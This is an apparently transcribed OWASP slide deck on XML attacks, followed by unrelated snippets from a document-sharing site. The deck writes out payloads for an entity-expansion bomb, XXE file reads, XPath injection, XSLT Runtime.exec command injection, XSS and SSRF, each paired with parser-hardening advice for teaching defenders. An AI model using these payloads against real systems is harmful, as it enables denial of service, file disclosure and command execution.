OWASP. XML Attack Surface. Business Analytics Security Competency Group
|
|
- Jeffrey Greer
- 6 years ago
- Views:
Transcription
1 XML Attack Surface Business Analytics Security Competency Group
2 XML is Pervasive 2/32
3 XML intro Born in 1998 (see initial specifications) Data interchange format Parsers International languages support Text based Human readable DOM SAX, rooted in Ottawa (see bio) StAX Complementary technologies and standards XML Validation (DTD, XSD,...) XML Transformation (XSLT) XML Query (XQuery, XPath) 3/32
4 Is XML Secure? Nothing wrong with the standard itself Most vulnerabilities due to Libraries/Tools misconfiguration Insufficient validation of untrusted input known, reported security vulnerabilities (see CVE search) 4/32
5 XML Bomb CWE-776: Denial of service (memory exhaustion) Amit Klein, 2002 (see BugTraq) XML entity expansion <!DOCTYPE ibm [ <!ENTITY ernst128 <!ENTITY ernst <!ENTITY ernst002 <!ENTITY ernst001 <!ENTITY ernst000 ]> <ibm>&ernst000;</ibm> "pierre"> "&ernst128;&ernst128;"> "&ernst003;&ernst003;"> "&ernst002;&ernst002;"> "&ernst001;&ernst001;"> 5/32
6 Modus Operandi Attacker Vulnerable Server POST /request HTTP/ <ibm>&ernst000;</ <ibm>&ernst001;&e <ibm>&ernst002;&e <ibm>&ernst003;&e ibm> rnst001;</ibm> rnst002;&ernst002 rnst003;&ernst003 ;&ernst002;</ibm> ;&ernst003;&ernst 003;&ernst003;&er nst003;&ernst003; </ibm> 6/32
7 Demo #1: Server Crash with XML Bomb (Source code available on demand) 7/32
8 Variation: Quadratic Blowup Attack Amit Klein (see MSDN article) Uses one single entity of size 50KB Reference the entity 50,000 times Useful to bypass FEATURE_SECURE_PROCESSING protection Limits entity expansions to 100,000 (IBM) 64,000 (Oracle) <!DOCTYPE pierre [ <!ENTITY e "eeeeeeeeeeee...eeeeeeeee"> ]> <pierre>&e;&e;&e;...&e;&e;&e;</pierre> 8/32
9 Protection DOM SAX factory.setfeature(" /xml/features/disallow-doctype-decl", true); StAX factory.setpropert y(xmlinputfactory. IS_REPLACING_ENTIT Y_REFERENCES, false); 9/32
10 External Entity Reference (XXE) CWE-611: Information Disclosure Gregory Steuck, 2002 (see BugTraq) Requires the server to include user-supplied data in the response <!DOCTYPE pierre [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini"> ]> <pierre>&ernst;</pierre> 10/32
11 Modus Operandi Attacker POST /request HTTP/1.1 Vulnerable Server <pierre>[... <pierre> content of the &ernst; file on the </pierre> server...]</pierr e> HTTP/ OK Content-Type: text/xml <response> Unknown service [... content of the file on the server...] </response> 11/32
12 Demo #2: File Content Disclosure with XXE (Source code available on demand) 12/32
13 Protection DOM SAX factory.setfeature(" /xml/features/disallow-doctype-decl", true); StAX factory.setpropert y(xmlinputfactory. IS_REPLACING_ENTIT Y_REFERENCES, false); 13/32
14 Blind Xpath Injection ( XML Injection ) CWE-643: Abuse of Functionality Amit Klein, 2004 (see white-paper) User input is embedded as-is in Xpath statement <users> <user> <name>pierre</name> <password>i8simon</password> </user> <user> <name>trevor</name> <password>mee2</password> </user> </users> //users/user[name/text()= and password/text()= '' 'pierre' 'pierre oror ''=' ''='' 'i8simon' *********** '' or ''='' ]/name/text() 14/32
15 Modus Operandi Attacker Vulnerable Server POST /login HTTP/ //users/user[name/ text()= '' or ''='' and password/text()= '' or ''=''] /name/text() pierre trevor HTTP/ OK Content-Type: text/html 15/32
16 Demo #3: Blind Xpath Injection (Source code available on demand) 16/32
17 Variation: Read System Properties JAXP implementation: IBM Oracle Interesting properties: os.version user.name java.class.path sun.java.command system-property('sun.java.command') 17/32
18 Protection Input Validation. [A-Za-z0-9_\-]+ in our example. 18/32
19 Code Injection during XSLT CWE-94: Improper Control of Generation of Code When the attacker can control the XML style sheet applied to an XML document. Uses transformer engine extension capabilities <xsl:stylesheet version="1.0" xmlns:xsl=" xmlns:rt="xalan://java.lang.runtime" exclude-result-prefixes="rt"> <xsl:template match="/"> <xsl:variable name="obj" select="rt:getruntime()"/> <xsl:value-of select="rt:exec($obj,'calc.exe')"/> </xsl:template> </xsl:stylesheet> 19/32
20 Modus Operandi Attacker <doc> whatever </doc> <stylesheet> malicious </stylesheet> Vulnerable Server GET /request?doc=...&stylesheet=... HTTP/ Load class java.lang.runtime 3 Call exec() method 20/32
21 Demo #4: Remote OS Command Injection (Source code available on demand) 21/32
22 Variation #1: Universal XXE Universal : you always see the entity in the response <!DOCTYPE xsl:stylesheet [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini"> ]> <xsl:stylesheet version="1.0" xmlns:xsl=" <xsl:template match="/"> &ernst; </xsl:template> </xsl:stylesheet> 22/32
23 Variation #2: Infinite Loop <xsl:stylesheet version="1.0" xmlns:xsl=" <xsl:template name="loop"> <xsl:call-template name="loop"/> </xsl:template> 2 1 <xsl:template match="/"> <xsl:call-template name="loop"/> </xsl:template> </xsl:stylesheet> 23/32
24 Variation #3: Cross-Site Scripting (XSS) <xsl:stylesheet version="1.0" xmlns:xsl=" xmlns:xhtml=" <xsl:output method="html"/> <xsl:template match="/"> <xhtml:script>alert('xss');</xhtml:script> </xsl:template> </xsl:stylesheet> 24/32
25 Protection Several ways to abuse XML Stylesheet Transforms. Users should never been able to use custom XML stylesheets. 25/32
26 Server Side Request Forgery (SSRF) CWE-601: Open Redirect, but server-to-server {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon) XML vectors: Xml external Entities (XXE) Xinclude External Doctype inclusion: <!DOCTYPE PIERRE PUBLIC "ernst" " <pierre/> 26/32
27 Modus Operandi Attacker Vulnerable Server Internal Service 1 POST /request HTTP/1.1 Content-Type: application/xml Content-Lenght: 666 <?xml version= 1.0?>... whatever 2 27/32
28 Protection DOM SAX factory.setfeature(" xml/features/disallow-doctype-decl", true); StAX factory.setpropert y(xmlinputfactory. SUPPORT_DTD, false); 28/32
29 Variation: Exotic Java URL Handlers {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE ) 29/32
30 Conclusions Always configure your XML parsers to disallow Doctype. From a server's perspective, clients should not be able to define the grammar of the request anyway Secure Processing Flag is not enough Preventing external entity expansion is not enough XPath: validate user's input XSLT: avoid at any cost Always apply Java patches from vendors 30/32
31 Pierre Ernst 10 years as Software Developer 5 years as Penetration Tester 750+ vulns Manual Code Review Manual Black Box Testing Java, XML, Open Source, pierre.ernst@gmail.com 31/32
32 Questions & Answers 32/32
PASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year
PASS4TEST IT Certification Guaranteed, The Easy Way! \ http://www.pass4test.com We offer free update service for one year Exam : 000-141 Title : XML and related technologies Vendors : IBM Version : DEMO
More information1. Description. 2. Systems affected Wink deployments
Apache Wink Security Advisory (CVE-2010-2245) Apache Wink allows DTD based XML attacks Author: Mike Rheinheimer (adapted from Axis2, originally by Andreas Veithen) July 6, 2010 1. Description Apache Wink
More informationAuthor: Irena Holubová Lecturer: Martin Svoboda
NPRG036 XML Technologies Lecture 6 XSLT 9. 4. 2018 Author: Irena Holubová Lecturer: Martin Svoboda http://www.ksi.mff.cuni.cz/~svoboda/courses/172-nprg036/ Lecture Outline XSLT Principles Templates Instructions
More informationGUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.
Report on IRONWASP Software Product: IronWASP Description of the Product: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing.
More informationGenerating Variants Using XSLT Tutorial
Table of Contents 1. Overview... 1 2. About this tutorial... 1 3. Setting up the pure::variants project... 1 4. Setting up the feature model... 3 5. Setting up the family model... 4 6. Setting up the XSLT
More informationApplications Security
Applications Security OWASP Top 10 PyCon Argentina 2018 Objectives Generate awareness and visibility on web-apps security Set a baseline of shared knowledge across the company Why are we here / Trigger
More informationContent Mirroring Configuration
Content Mirroring Configuration Product version: 4.51 Document version: 1.1 Document creation date: 02-01-2006 Purpose This document describes how to configure mirroring in EPiServer and contains information
More informationAttacks on Web Services. OWASP May, 6th The OWASP Foundation Renaud Bidou CTO - R&D Manager DenyAll
Attacks on Web Services OWASP May, 6th 2009 Renaud Bidou CTO - R&D Manager DenyAll rbidou@denyall.com Copyright The OWASP Foundation Permission is granted to copy, distribute and/or modify this document
More informationSoK: XML Parser Vulnerabilities. Horst-Görtz Institute for IT-Security, Ruhr-University Bochum
SoK: XML Parser Vulnerabilities Christopher Späth Vladislav Mladenov Christian Mainka Jörg Schwenk Horst-Görtz Institute for IT-Security, Ruhr-University Bochum Ruhr-University Bochum https://nds.rub.de/
More informationXSLT: How Do We Use It?
XSLT: How Do We Use It? Nancy Hallberg Nikki Massaro Kauffman 1 XSLT: Agenda Introduction & Terminology XSLT Walkthrough Client-Side XSLT/XHTML Server-Side XSLT/XHTML More Creative Server-Side XSLT 2 XSLT:
More informationEXAM IN SEMI-STRUCTURED DATA Study Code Student Id Family Name First Name
EXAM IN SEMI-STRUCTURED DATA 184.705 28. 10. 2016 Study Code Student Id Family Name First Name Working time: 100 minutes. Exercises have to be solved on this exam sheet; Additional slips of paper will
More informationXML. Objectives. Duration. Audience. Pre-Requisites
XML XML - extensible Markup Language is a family of standardized data formats. XML is used for data transmission and storage. Common applications of XML include business to business transactions, web services
More informationOWASPORLANDO. XXE: The Anatomy of an XML Attack. Mike Felch OWASP Orlando
OWASPORLANDO XXE: The Anatomy of an XML Attack About Myself Just a Little Background Sr. Penetration Tester Programming since 1998 Son of a firmware engineer RE / VR / ED Hobbyist Fascination with how
More informationWeb Application Vulnerabilities: OWASP Top 10 Revisited
Pattern Recognition and Applications Lab Web Application Vulnerabilities: OWASP Top 10 Revisited Igino Corona igino.corona AT diee.unica.it Computer Security April 5th, 2018 Department of Electrical and
More informationCNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components
CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network
More informationCHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS
180 CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS 8.1 SUMMARY This research has focused on developing a Web Applications Secure System from Code Injection Vulnerabilities through Web Services (WAPS-CIVS),
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationWeb Services and SOA. The OWASP Foundation Laurent PETROQUE. System Engineer, F5 Networks
Web Services and SOA Laurent PETROQUE System Engineer, F5 Networks OWASP-Day II Università La Sapienza, Roma 31st, March 2008 Copyright 2008 - The OWASP Foundation Permission is granted to copy, distribute
More informationCertified Secure Web Application Secure Development Checklist
www.certifiedsecure.com info@certifiedsecure.com Tel.: +31 (0)70 310 13 40 Loire 128-A 2491 AJ The Hague The Netherlands About Certified Secure Checklist Certified Secure exists to encourage and fulfill
More informationSECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS
SECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS Contents Introduction...3 1. Research Methodology...4 2. Executive Summary...5 3. Participant Portrait...6 4. Vulnerability Statistics...8 4.1.
More informationXSLT (part I) Mario Alviano A.Y. 2017/2018. University of Calabria, Italy 1 / 22
1 / 22 XSLT (part I) Mario Alviano University of Calabria, Italy A.Y. 2017/2018 Outline 2 / 22 1 Introduction 2 Templates 3 Attributes 4 Copy of elements 5 Exercises 4 / 22 What is XSLT? XSLT is a (Turing
More informationEXAM IN SEMI-STRUCTURED DATA Study Code Student Id Family Name First Name
EXAM IN SEMI-STRUCTURED DATA 184.705 10. 01. 2017 Study Code Student Id Family Name First Name Working time: 100 minutes. Exercises have to be solved on this exam sheet; Additional slips of paper will
More informationComputer Science E-259
Computer Science E-259 XML with Java Lecture 4: XPath 1.0 (and 2.0) and XSLT 1.0 (and 2.0) 21 February 2007 David J. Malan malan@post.harvard.edu 1 Computer Science E-259 Last Time DOM Level 3 JAXP 1.3
More informationOracle Application Server 10g Oracle XML Developer s Kit Frequently Asked Questions September, 2005
Oracle Application Server 10g Oracle XML Developer s Kit Frequently Asked Questions September, 2005 This FAQ addresses frequently asked questions relating to the XML features of Oracle XML Developer's
More informationWeb Programming Paper Solution (Chapter wise)
What is valid XML document? Design an XML document for address book If in XML document All tags are properly closed All tags are properly nested They have a single root element XML document forms XML tree
More informationBank Infrastructure - Video - 1
Bank Infrastructure - 1 05/09/2017 Threats Threat Source Risk Status Date Created Account Footprinting Web Browser Targeted Malware Web Browser Man in the browser Web Browser Identity Spoofing - Impersonation
More informationHypermedia and the Web XSLT and XPath
Hypermedia and the Web XSLT and XPath XSLT Extensible Stylesheet Language for Transformations Compare/contrast with CSS: CSS is used to change display characteristics of primarily HTML documents. But,
More informationXSLT. Lecture 38. Robb T. Koether. Mon, Apr 21, Hampden-Sydney College. Robb T. Koether (Hampden-Sydney College) XSLT Mon, Apr 21, / 26
XSLT Lecture 38 Robb T. Koether Hampden-Sydney College Mon, Apr 21, 2014 Robb T. Koether (Hampden-Sydney College) XSLT Mon, Apr 21, 2014 1 / 26 1 XSLT 2 Running XSLT 3 XSLT Files 4 Output Modes 5 XSLT
More informationCopyright
1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?
More informationEXAM IN SEMI-STRUCTURED DATA Study Code Student Id Family Name First Name
EXAM IN SEMI-STRUCTURED DATA 184.705 12. 01. 2016 Study Code Student Id Family Name First Name Working time: 100 minutes. Exercises have to be solved on this exam sheet; Additional slips of paper will
More informationCertified Secure Web Application Security Test Checklist
www.certifiedsecure.com info@certifiedsecure.com Tel.: +31 (0)70 310 13 40 Loire 128-A 2491 AJ The Hague The Netherlands Certified Secure Checklist About Certified Secure exists to encourage and fulfill
More informationThe main Topics in this lecture are:
Lecture 15: Working with Extensible Markup Language (XML) The main Topics in this lecture are: - Brief introduction to XML - Some advantages of XML - XML Structure: elements, attributes, entities - What
More informationChat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev
Chat with a hacker Increase attack surface for Pentest A talk by Egor Karbutov and Alexey Pertsev $ Whoarewe Egor Karbutov & Alexey Pertsev Penetration testers @Digital Security Speakers Bug Hunters 2
More informationXML. Jonathan Geisler. April 18, 2008
April 18, 2008 What is? IS... What is? IS... Text (portable) What is? IS... Text (portable) Markup (human readable) What is? IS... Text (portable) Markup (human readable) Extensible (valuable for future)
More informationEPRI Software Development 2016 Guide for Testing Your Software. Software Quality Assurance (SQA)
EPRI Software Development 2016 Guide for Testing Your Software Software Quality Assurance (SQA) Usability Testing Sections Installation and Un-Installation Software Documentation Test Cases or Tutorial
More informationPerslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.
Eleonora Petridou Pascal Cuylaerts System And Network Engineering University of Amsterdam June 30, 2011 Outline Research question About Perslink Approach Manual inspection Automated tests Vulnerabilities
More informationDelivery Options: Attend face-to-face in the classroom or via remote-live attendance.
XML Programming Duration: 5 Days US Price: $2795 UK Price: 1,995 *Prices are subject to VAT CA Price: CDN$3,275 *Prices are subject to GST/HST Delivery Options: Attend face-to-face in the classroom or
More informationXML Wrap-up. CS 431 March 1, 2006 Carl Lagoze Cornell University
XML Wrap-up CS 431 March 1, 2006 Carl Lagoze Cornell University XSLT Processing Model Input XSL doc parse Input XML doc parse Parsed tree serialize Input XML doc Parsed tree Xformed tree Output doc (xml,
More informationDocument Parser Interfaces. Tasks of a Parser. 3. XML Processor APIs. Document Parser Interfaces. ESIS Example: Input document
3. XML Processor APIs How applications can manipulate structured documents? An overview of document parser interfaces 3.1 SAX: an event-based interface 3.2 DOM: an object-based interface Document Parser
More informationStyle Sheet A. Bellaachia Page: 22
Style Sheet How to render the content of an XML document on a page? Two mechanisms: CSS: Cascading Style Sheets XSL (the extensible Style sheet Language) CSS Definitions: CSS: Cascading Style Sheets Simple
More informationOWASP Top David Caissy OWASP Los Angeles Chapter July 2017
OWASP Top 10-2017 David Caissy OWASP Los Angeles Chapter July 2017 About Me David Caissy Web App Penetration Tester Former Java Application Architect IT Security Trainer: Developers Penetration Testers
More informationXML Master: Professional V2
XML I10-002 XML Master: Professional V2 Version: 4.0 QUESTION NO: 1 Which of the following correctly describes the DOM (Level 2) Node interface? A. The Node interface can be used to change the value (nodevalue)
More informationThe Image that called me
The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011 Introduction Mario Heiderich Researcher and PhD student at the Ruhr- University, Bochum Security
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationGenerating Web Pages Using XSLT
Generating Web Pages Using XSLT 238 XSLT for Data Interchange 239 6.1.xml: An Employee List Document
More informationWEB APPLICATION SCANNERS. Evaluating Past the Base Case
WEB APPLICATION SCANNERS Evaluating Past the Base Case GREG OSE PATRICK TOOMEY Presenter Intros Overview An overview of web application scanners Why is it hard to evaluate scanner efficacy? Prior Work
More informationCSI 3140 WWW Structures, Techniques and Standards. Representing Web Data: XML
CSI 3140 WWW Structures, Techniques and Standards Representing Web Data: XML XML Example XML document: An XML document is one that follows certain syntax rules (most of which we followed for XHTML) Guy-Vincent
More informationClient Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
More informationDelivery Options: Attend face-to-face in the classroom or remote-live attendance.
XML Programming Duration: 5 Days Price: $2795 *California residents and government employees call for pricing. Discounts: We offer multiple discount options. Click here for more info. Delivery Options:
More informationIntroduction to XML. XML: basic elements
Introduction to XML XML: basic elements XML Trying to wrap your brain around XML is sort of like trying to put an octopus in a bottle. Every time you think you have it under control, a new tentacle shows
More informationXML Overview, part 1
XML Overview, part 1 Norman Gray Revision 1.4, 2002/10/30 XML Overview, part 1 p.1/28 Contents The who, what and why XML Syntax Programming with XML Other topics The future http://www.astro.gla.ac.uk/users/norman/docs/
More informationFrom blind XXE to root-level file read access
BLOG WEBSEC ABOUT From blind XXE to root-level file read access Posted on December 12, 2018 by Pieter On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted
More informationHacker Attacks on the Horizon: Web 2.0 Attack Vectors
IBM Software Group Hacker Attacks on the Horizon: Web 2.0 Attack Vectors Danny Allan Director, Security Research dallan@us.ibm.com 2/21/2008 Agenda HISTORY Web Eras & Trends SECURITY Web 2.0 Attack Vectors
More informationWeb Application & Web Server Vulnerabilities Assessment Pankaj Sharma
Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?
More informationAbout the OWASP Top 10
OWASP Top-10 2017 Dave Wichers Previous OWASP Top 10 Project Lead (2003 thru 2017) Former OWASP Board Member (2003 thru 2013) CoFounder and COO, Aspect Security which is now EY About the OWASP Top 10 2
More information7.1 Introduction. extensible Markup Language Developed from SGML A meta-markup language Deficiencies of HTML and SGML
7.1 Introduction extensible Markup Language Developed from SGML A meta-markup language Deficiencies of HTML and SGML Lax syntactical rules Many complex features that are rarely used HTML is a markup language,
More informationSolutions Business Manager Web Application Security Assessment
White Paper Solutions Business Manager Solutions Business Manager 11.3.1 Web Application Security Assessment Table of Contents Micro Focus Takes Security Seriously... 1 Solutions Business Manager Security
More informationExtensions to XSLT 1.0, and XSLT 2.0
... Extensions A typical problem: XSLT 1.0 does not have any way of finding the current date and time. However, some XSLT 1.0 processors allow you to use extensions to XSLT 1.0. The EXSLT initiative http://www.exslt.org/
More informationMirroring - Configuration and Operation
Mirroring - Configuration and Operation Product version: 4.60 Document version: 1.0 Document creation date: 31-03-2006 Purpose This document contains a description of content mirroring and explains how
More informationExtreme Java G Session 3 - Sub-Topic 5 XML Information Rendering. Dr. Jean-Claude Franchitti
Extreme Java G22.3033-007 Session 3 - Sub-Topic 5 XML Information Rendering Dr. Jean-Claude Franchitti New York University Computer Science Department Courant Institute of Mathematical Sciences 1 Agenda
More informationC1: Define Security Requirements
OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security
More informationPaypal XXE Sean https://www.linkedin.com/in/meliasean https://www.hackerone.com/meals
Paypal XXE Sean Melia @seanmeals https://www.linkedin.com/in/meliasean https://www.hackerone.com/meals Introduction I was able to find three XML External Entity (XXE) attacks on PayPal s externally facing
More informationXML. Rodrigo García Carmona Universidad San Pablo-CEU Escuela Politécnica Superior
XML Rodrigo García Carmona Universidad San Pablo-CEU Escuela Politécnica Superior XML INTRODUCTION 2 THE XML LANGUAGE XML: Extensible Markup Language Standard for the presentation and transmission of information.
More informationCopyright 2008 Pearson Education, Inc. Publishing as Pearson Addison-Wesley. Chapter 7 XML
Chapter 7 XML 7.1 Introduction extensible Markup Language Developed from SGML A meta-markup language Deficiencies of HTML and SGML Lax syntactical rules Many complex features that are rarely used HTML
More informationWeb Vulnerabilities. And The People Who Love Them
Web Vulnerabilities And The People Who Love Them Me Tom Hudson Technical Trainer at Sky Betting & Gaming TomNomNom online Occasional bug hunter Lover of analogies Lover of questions Insecure Direct Object
More informationApplication security. Not so obvious vulnerabilities. Nicolas Grégoire / Agarri CERN
Application security Not so obvious vulnerabilities Nicolas Grégoire / Agarri CERN Outline PHP Laxism XML Risks Blacklist Evasion XSLT Madness $ Whoami Nicolas Grégoire / Agarri Founder 13 years of Infosec
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 4 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2411 1 Extensible
More informationEXAM XML 1.1 and Related Technologies TYPE: DEMO
IBM EXAM - 000-142 XML 1.1 and Related Technologies TYPE: DEMO http://www.examskey.com/000-142.html 1 Question: 1 XML data is stored and retrieved within a relational database for a data-centric application
More informationTaking White Hats to the Laundry: How to Strengthen Testing in Common Criteria
Taking White Hats to the Laundry: How to Strengthen Testing in Common Criteria Apostol Vassilev, Principal Consultant September 23,2009. Product Testing in Common Criteria Product Testing in Common Criteria
More informationIBM. XML and Related Technologies Dumps Braindumps Real Questions Practice Test dumps free
000-141 Dumps 000-141 Braindumps 000-141 Real Questions 000-141 Practice Test 000-141 dumps free IBM 000-141 XML and Related Technologies http://killexams.com/pass4sure/exam-detail/000-141 collections
More informationExcel to XML v3. Compatibility Switch 13 update 1 and higher. Windows or Mac OSX.
App documentation Page 1/5 Excel to XML v3 Description Excel to XML will let you submit an Excel file in the format.xlsx to a Switch flow where it will be converted to XML and/or metadata sets. It will
More informationA4: Insecure Direct Object References
A4: Insecure Direct Object References A4 Insecure Direct Object References General problem: Unrestricted Access A4: Data not properly protected A7: Functions not properly protected Examples Presentation-layer
More informationXML. COSC Dr. Ramon Lawrence. An attribute is a name-value pair declared inside an element. Comments. Page 3. COSC Dr.
COSC 304 Introduction to Database Systems XML Dr. Ramon Lawrence University of British Columbia Okanagan ramon.lawrence@ubc.ca XML Extensible Markup Language (XML) is a markup language that allows for
More informationTwo hours UNIVERSITY OF MANCHESTER SCHOOL OF COMPUTER SCIENCE. M.Sc. in Advanced Computer Science. Date: Tuesday 20 th May 2008.
COMP60370 Two hours UNIVERSITY OF MANCHESTER SCHOOL OF COMPUTER SCIENCE M.Sc. in Advanced Computer Science Semi-Structured Data and the Web Date: Tuesday 20 th May 2008 Time: 09:45 11:45 Please answer
More informationCOP 4814 Florida International University Kip Irvine XSLT. Updated: 2/9/2016 Based on Goldberg, Chapter 2. Irvine COP 4814
COP 4814 Florida International University Kip Irvine XSLT Updated: 2/9/2016 Based on Goldberg, Chapter 2 XSL Overview XSL Extensible Stylesheet Language A family of languages used to transform and render
More informationHacking Web Sites OWASP Top 10
Hacking Web Sites OWASP Top 10 Emmanuel Benoist Spring Term 2018 Berner Fachhochschule Haute cole spcialise bernoise Berne University of Applied Sciences 1 Web Security: Overview of other security risks
More informationXSLT program. XSLT elements. XSLT example. An XSLT program is an XML document containing
XSLT CPS 216 Advanced Database Systems Announcements (March 24) 2 Homework #3 will be assigned next Tuesday Reading assignment due next Wednesday XML processing in Lore (VLDB 1999) and Niagara (VLDB 2003)
More informationWEB APPLICATION PENETRATION TESTING EXTREME VERSION 1
WEB APPLICATION PENETRATION TESTING EXTREME VERSION 1 The most advanced course on web application penetration testing elearnsecurity has been chosen by students in over 140 countries in the world and by
More informationSDN Community Contribution
SDN Community Contribution (This is not an official SAP document.) Disclaimer & Liability Notice This document may discuss sample coding or other information that does not include SAP official interfaces
More informationPASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year
PASS4TEST IT Certification Guaranteed, The Easy Way! \ http://www.pass4test.com We offer free update service for one year Exam : I10-002 Title : XML Master: Professional V2 Vendors : XML Master Version
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More informationSetting Up EPiServer for Demo
Setting Up EPiServer for Demo Abstract This document describes how to set up a standard EPiServer installation so that it can be used in a demo environment. Product version: 4.51 Document version: 1.0
More informationEXAM IN SEMI-STRUCTURED DATA Study Code Student Id Family Name First Name
EXAM IN SEMI-STRUCTURED DATA 184.705 24. 6. 2015 Study Code Student Id Family Name First Name Working time: 100 minutes. Exercises have to be solved on this exam sheet; Additional slips of paper will not
More informationApplication security : going quicker
Application security : going quicker The web application firewall example Agenda Agenda o Intro o Application security o The dev team approach o The infra team approach o Impact of the agility o The WAF
More informationAdvanced Studies in IT CT433 Exam Q&A
Advanced Studies in IT CT433 Exam Q&A Dr. Axel Polleres www.deri.ie Copyright 2008 Digital Enterprise Research Institute. All rights reserved. XML Know what is well-formed XML, valid XML Well-formed: Close
More informationAndrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West
Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing Advancing Expertise in Security Testing Taming the Wild West Canberra, Australia 1 Who is this guy? Andrew
More informationQ WEB APPLICATION ATTACK STATISTICS
WEB APPLICATION ATTACK STATISTICS CONTENTS Introduction...3 Results at a glance...4 Web application attacks: statistics...5 Attack types...5 Attack trends...10 Conclusions...12 2 INTRODUCTION This report
More informationOWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13
Airlock and the OWASP TOP 10-2017 Version 2.1 11.24.2017 OWASP Top 10 A1 Injection... 3 A2 Broken Authentication... 5 A3 Sensitive Data Exposure... 6 A4 XML External Entities (XXE)... 7 A5 Broken Access
More informationFinding Vulnerabilities in Web Applications
Finding Vulnerabilities in Web Applications Christopher Kruegel, Technical University Vienna Evolving Networks, Evolving Threats The past few years have witnessed a significant increase in the number of
More informationLecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion
IN5290 Ethical Hacking Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion Universitetet i Oslo Laszlo Erdödi Lecture Overview What is SQL injection
More informationWEB APPLICATION VULNERABILITIES
WEB APPLICATION VULNERABILITIES CONTENTS Introduction... 3 1. Materials and methods... 3 2. Executive summary... 4 3. Client snapshot... 4 4. Trends... 5 5. Manual web application security assessment...
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationExcel to XML v4. Version adds two Private Data sets
Excel to XML v4 Page 1/6 Excel to XML v4 Description Excel to XML will let you submit an Excel file in the format.xlsx to a Switch flow were it will be converted to XML and/or metadata sets. It will accept
More informationUsing WebSphere DataPower SOA Appliance with the FTP Transport Protocol
IBM Software Group Using WebSphere DataPower SOA Appliance with the FTP Transport Protocol David Shute (dshute@us.ibm.com) DataPower Enablement Program Manager 1 February 2011 WebSphere Support Technical
More informationSecure Programming Techniques
Secure Programming Techniques Meelis ROOS mroos@ut.ee Institute of Computer Science Tartu University spring 2014 Course outline Introduction General principles Code auditing C/C++ Web SQL Injection PHP
More informationCopyright
1 SECURITY TEST Data flow -- Can you establish an audit trail for data, what goes where, is data in transit protected, and who has access to it? Data storage -- Where is data stored, and is it encrypted?
More informationDEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
More informationOPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES
OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES What is the OWASP Top 10? A list of the top ten web application vulnerabilities Determined by OWASP and the security community at large
More informationSECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS
SECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS 2017 Contents Introduction... 3 1. Materials and methods... 3 2. Executive summary... 4 3. Participant portrait... 5 4. Trends... 6 5. Manual web
More informationIBM WebSphere software platform for e-business
IBM WebSphere software platform for e-business XML Review Cao Xiao Qiang Solution Enablement Center, IBM May 19, 2001 Agenda What is XML? Why XML? XML Technology Types of XML Documents DTD XSL/XSLT Available
More information